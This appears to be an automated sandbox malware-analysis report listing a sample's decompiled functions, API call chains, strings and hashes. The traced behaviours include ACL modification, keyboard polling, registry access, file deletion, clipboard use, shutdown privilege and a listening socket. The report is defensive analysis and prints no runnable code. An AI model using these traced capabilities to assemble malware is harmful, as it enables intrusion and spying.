                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                    • String ID: 0
                                    • API String ID: 3616455698-4108050209
                                    • Opcode ID: 550ef5bbd267d005018efce133bc2f19cc97b2b3358109bd800ef6738803f103
                                    • Instruction ID: a6da45c1a21116f9bf9e6c8ce1dcbf454fa657b9621dbc768565c17973592528
                                    • Opcode Fuzzy Hash: 550ef5bbd267d005018efce133bc2f19cc97b2b3358109bd800ef6738803f103
                                    • Instruction Fuzzy Hash: 39816A70608301EFDB24CF15D884AABBBE9FB88314F14492EF999D7291D770D946CB92
                                    Function 0016A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0016ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0016ABD7
                                      • Part of subcall function 0016ABBB: GetLastError.KERNEL32(?,0016A69F,?,?,?), ref: 0016ABE1
                                      • Part of subcall function 0016ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0016A69F,?,?,?), ref: 0016ABF0
                                      • Part of subcall function 0016ABBB: RtlAllocateHeap.NTDLL(00000000,?,0016A69F), ref: 0016ABF7
                                      • Part of subcall function 0016ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0016AC0E
                                      • Part of subcall function 0016AC56: GetProcessHeap.KERNEL32(00000008,0016A6B5,00000000,00000000,?,0016A6B5,?), ref: 0016AC62
                                      • Part of subcall function 0016AC56: RtlAllocateHeap.NTDLL(00000000,?,0016A6B5), ref: 0016AC69
                                      • Part of subcall function 0016AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0016A6B5,?), ref: 0016AC7A
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0016A6D0
                                    • _memset.LIBCMT ref: 0016A6E5
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0016A704
                                    • GetLengthSid.ADVAPI32(?), ref: 0016A715
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0016A752
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0016A76E
                                    • GetLengthSid.ADVAPI32(?), ref: 0016A78B
                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0016A79A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0016A7A1
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0016A7C2
                                    • CopySid.ADVAPI32(00000000), ref: 0016A7C9
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0016A7FA
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0016A820
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0016A834
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                    • String ID:
                                    • API String ID: 2347767575-0
                                    • Opcode ID: 08a149d84020ec613105ef8babeba77f2d5d9ea591ee17a9891aabea574f6d41
                                    • Instruction ID: 809799fc910cc6ac31e3d7a9f881b6f8a2674042e045570f7a951ec4e7ed1f8a
                                    • Opcode Fuzzy Hash: 08a149d84020ec613105ef8babeba77f2d5d9ea591ee17a9891aabea574f6d41
                                    • Instruction Fuzzy Hash: 0F515B7190020AAFDF14DFA4DC85AEEBBB9FF04300F448129F911A7290EB359A55CF61
                                    Function 00136F07 Relevance: 19.6, Strings: 15, Instructions: 883COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$hixjsfhixjsfhixjsbhixjs8hixjs7hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs8hixjs5hixjs7hixjschixjsfhixj
                                    • API String ID: 0-950218936
                                    • Opcode ID: cee7df69a20551725e27a645b1e97e0cd2f4ce993cc92113d873383e3e058744
                                    • Instruction ID: 4b5c9a33afe32d66a17fd942cdb0321ed3d7dac1bdfa34bcfe31e252fa881c4d
                                    • Opcode Fuzzy Hash: cee7df69a20551725e27a645b1e97e0cd2f4ce993cc92113d873383e3e058744
                                    • Instruction Fuzzy Hash: 987281B1E04219DBDF28CF99D8807EEB7B5BF58310F15816AE815EB280DB709E45DB90
                                    Function 001763F9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 89fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00176EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00175FA6,?), ref: 00176ED8
                                      • Part of subcall function 001772CB: GetFileAttributesW.KERNEL32(?,00176019), ref: 001772CC
                                    • _wcscat.LIBCMT ref: 00176441
                                    • __wsplitpath.LIBCMT ref: 0017645F
                                    • FindFirstFileW.KERNEL32(?,?), ref: 00176474
                                    • _wcscpy.LIBCMT ref: 001764A3
                                    • _wcscat.LIBCMT ref: 001764B8
                                    • _wcscat.LIBCMT ref: 001764CA
                                    • DeleteFileW.KERNEL32(?), ref: 001764DA
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001764EB
                                    • FindClose.KERNEL32(00000000), ref: 00176506
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                    • String ID: \*.*$p1Wu`KXu
                                    • API String ID: 2643075503-2866000061
                                    • Opcode ID: db77b081b5fcb31d8d4486a94ea8e084454bdb61b9459c3e7aa5d89fc05447b4
                                    • Instruction ID: b106e881b947fef5e79c5246790802efb2554a5af93a5adef3b52623075c4dce
                                    • Opcode Fuzzy Hash: db77b081b5fcb31d8d4486a94ea8e084454bdb61b9459c3e7aa5d89fc05447b4
                                    • Instruction Fuzzy Hash: A731B4B2408384AAC321DBE488859DB77ECAF6A310F044A6EF9E9C3141EB35D54D8767
                                    Function 001931BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00193C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00192BB5,?,?), ref: 00193C1D
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0019328E
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0019332D
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001933C5
                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00193604
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00193611
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                    • String ID:
                                    • API String ID: 1240663315-0
                                    • Opcode ID: 432ee86f5a54cdef476f5b59a904103ae25e8543bad2e0a6fbb567d91d93fbfd
                                    • Instruction ID: 3375723a1e9e96d74ee0a4c439d8ea97191c923555c57d60bd038d54bd1ee8a5
                                    • Opcode Fuzzy Hash: 432ee86f5a54cdef476f5b59a904103ae25e8543bad2e0a6fbb567d91d93fbfd
                                    • Instruction Fuzzy Hash: 7AE14C71604200AFCB14DF28C995E2ABBE9FF89714F05856DF45AD72A1DB30EE05CB92
                                    Function 00172B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 00172B5F
                                    • GetAsyncKeyState.USER32(000000A0), ref: 00172BE0
                                    • GetKeyState.USER32(000000A0), ref: 00172BFB
                                    • GetAsyncKeyState.USER32(000000A1), ref: 00172C15
                                    • GetKeyState.USER32(000000A1), ref: 00172C2A
                                    • GetAsyncKeyState.USER32(00000011), ref: 00172C42
                                    • GetKeyState.USER32(00000011), ref: 00172C54
                                    • GetAsyncKeyState.USER32(00000012), ref: 00172C6C
                                    • GetKeyState.USER32(00000012), ref: 00172C7E
                                    • GetAsyncKeyState.USER32(0000005B), ref: 00172C96
                                    • GetKeyState.USER32(0000005B), ref: 00172CA8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: 8f48d68ddba8b359dd3b5e6423f6f1cc0e4e6bc1b27c1f6ed9afbc804c298a20
                                    • Instruction ID: 172c212ea5acf717c9d9fbfa061e93de7c39e2ec432f7de67f7338025c648dd7
                                    • Opcode Fuzzy Hash: 8f48d68ddba8b359dd3b5e6423f6f1cc0e4e6bc1b27c1f6ed9afbc804c298a20
                                    • Instruction Fuzzy Hash: 5741D7346047C96DFF369B6488047F9BEB0AF21344F08C159D5CA576C2EBB499CAC7A2
                                    Function 00186D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                    • String ID:
                                    • API String ID: 1737998785-0
                                    • Opcode ID: e0a0ee4165f8f684e06a7a45a391fc74e3096157e30bae68e775ca7c8de348a5
                                    • Instruction ID: 0e985929127c654ad66060c1bd0900b5f883df0dce06a673b6df6bc33c4c15de
                                    • Opcode Fuzzy Hash: e0a0ee4165f8f684e06a7a45a391fc74e3096157e30bae68e775ca7c8de348a5
                                    • Instruction Fuzzy Hash: C521AE31700110AFDB19AFA5EC49B2D77A8FF14711F048119F94ADB2A1EB30EE808F91
                                    Function 0018C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00169ABF: CLSIDFromProgID.COMBASE ref: 00169ADC
                                      • Part of subcall function 00169ABF: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00169AF7
                                      • Part of subcall function 00169ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00169B05
                                      • Part of subcall function 00169ABF: CoTaskMemFree.COMBASE(00000000), ref: 00169B15
                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0018C235
                                    • _memset.LIBCMT ref: 0018C242
                                    • _memset.LIBCMT ref: 0018C360
                                    • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 0018C38C
                                    • CoTaskMemFree.COMBASE(?), ref: 0018C397
                                    Strings
                                    • NULL Pointer assignment, xrefs: 0018C3E5
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                    • String ID: NULL Pointer assignment
                                    • API String ID: 1300414916-2785691316
                                    • Opcode ID: 275163da9be9cfebc1397ab5ea05fb25e626894414666b2645e49ad49ca74143
                                    • Instruction ID: fb0e8c81e885e9f521afdfaffee09ec554472a1ca63e7c6c8eb8c33e24bdbf6e
                                    • Opcode Fuzzy Hash: 275163da9be9cfebc1397ab5ea05fb25e626894414666b2645e49ad49ca74143
                                    • Instruction Fuzzy Hash: 75913C71D00218ABDB10EF94DC85EDEBBB9EF18750F10816AF919A7281EB705A45CFA0
                                    Function 001713CA Relevance: 11.1, APIs: 1, Strings: 6, Instructions: 560stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001713DC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID: ($AddRef$InterfaceDispatch$QueryInterface$Release$|
                                    • API String ID: 1659193697-2318614619
                                    • Opcode ID: e60db90baf8b791dcd110134b54716b0c7700f87645f4f58b26d9e287fdb67f9
                                    • Instruction ID: 1ade981c1c81b83f0712a7f0c4a608762e5fb4d392ecb0af79ba187ef389c652
                                    • Opcode Fuzzy Hash: e60db90baf8b791dcd110134b54716b0c7700f87645f4f58b26d9e287fdb67f9
                                    • Instruction Fuzzy Hash: 36320575A00705AFC728CF69C481A6AB7F1FF48320B15C56EE59ADB3A1E770E941CB44
                                    Function 001A0133 Relevance: 10.7, APIs: 7, Instructions: 245windownativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • GetSystemMetrics.USER32(0000000F), ref: 001A016D
                                    • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 001A038D
                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 001A03AB
                                    • InvalidateRect.USER32(?,00000000,00000001,?), ref: 001A03D6
                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 001A03FF
                                    • ShowWindow.USER32(00000003,00000000), ref: 001A0421
                                    • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 001A0440
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$DialogInvalidateLongMetricsMoveNtdllProc_RectShowSystem
                                    • String ID:
                                    • API String ID: 2922825909-0
                                    • Opcode ID: 833896e8bbbdcd43eef39afba46cce59049f7f76df34adb23abc886d392fd252
                                    • Instruction ID: ba658c769d3744ece446f3f7dcfd1828ba71397df2149335d646d3a12dc28593
                                    • Opcode Fuzzy Hash: 833896e8bbbdcd43eef39afba46cce59049f7f76df34adb23abc886d392fd252
                                    • Instruction Fuzzy Hash: EEA1BE39600616EFDF19CF68C9857BDBBB1BF09750F058225EC54AB290E774ADA0CB90
                                    Function 0019ECD4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                      • Part of subcall function 0014B63C: GetCursorPos.USER32(000000FF), ref: 0014B64F
                                      • Part of subcall function 0014B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0014B66C
                                      • Part of subcall function 0014B63C: GetAsyncKeyState.USER32(00000001), ref: 0014B691
                                      • Part of subcall function 0014B63C: GetAsyncKeyState.USER32(00000002), ref: 0014B69F
                                    • ReleaseCapture.USER32 ref: 0019ED48
                                    • SetWindowTextW.USER32(?,00000000), ref: 0019EDF0
                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0019EE03
                                    • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0019EEDC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                    • API String ID: 973565025-2107944366
                                    • Opcode ID: 509031b6979a78a061ba210e2f0c684d3ee673e44e6c705b41143efeba44ba6b
                                    • Instruction ID: fc8ac41af80071a16667f8d1acb69c5641237383f173520959e5fbcb788dd35b
                                    • Opcode Fuzzy Hash: 509031b6979a78a061ba210e2f0c684d3ee673e44e6c705b41143efeba44ba6b
                                    • Instruction Fuzzy Hash: 9851AB70204300AFDB14DF20DC96FAA77E4FB98714F404A2DF995972E1DBB0A984CB52
                                    Function 001779D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0016B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0016B180
                                      • Part of subcall function 0016B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0016B1AD
                                      • Part of subcall function 0016B134: GetLastError.KERNEL32 ref: 0016B1BA
                                    • ExitWindowsEx.USER32(?,00000000), ref: 00177A0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                    • String ID: $@$SeShutdownPrivilege
                                    • API String ID: 2234035333-194228
                                    • Opcode ID: b653277cea43f80a9c86e3b7af32db76c684ce2a8018a5041a8ae9c7ed78a179
                                    • Instruction ID: 82fc94d12375d933c30987ef5383382c839bc7b11bfadc22c175a31167845591
                                    • Opcode Fuzzy Hash: b653277cea43f80a9c86e3b7af32db76c684ce2a8018a5041a8ae9c7ed78a179
                                    • Instruction Fuzzy Hash: DA01A7716592126AF72C6678EC9ABBF72789B00740F198524B957E30D2EBA15E0081A0
                                    Function 00188C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00188CA8
                                    • WSAGetLastError.WS2_32(00000000), ref: 00188CB7
                                    • bind.WS2_32(00000000,?,00000010), ref: 00188CD3
                                    • listen.WS2_32(00000000,00000005), ref: 00188CE2
                                    • WSAGetLastError.WS2_32(00000000), ref: 00188CFC
                                    • closesocket.WS2_32(00000000), ref: 00188D10
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
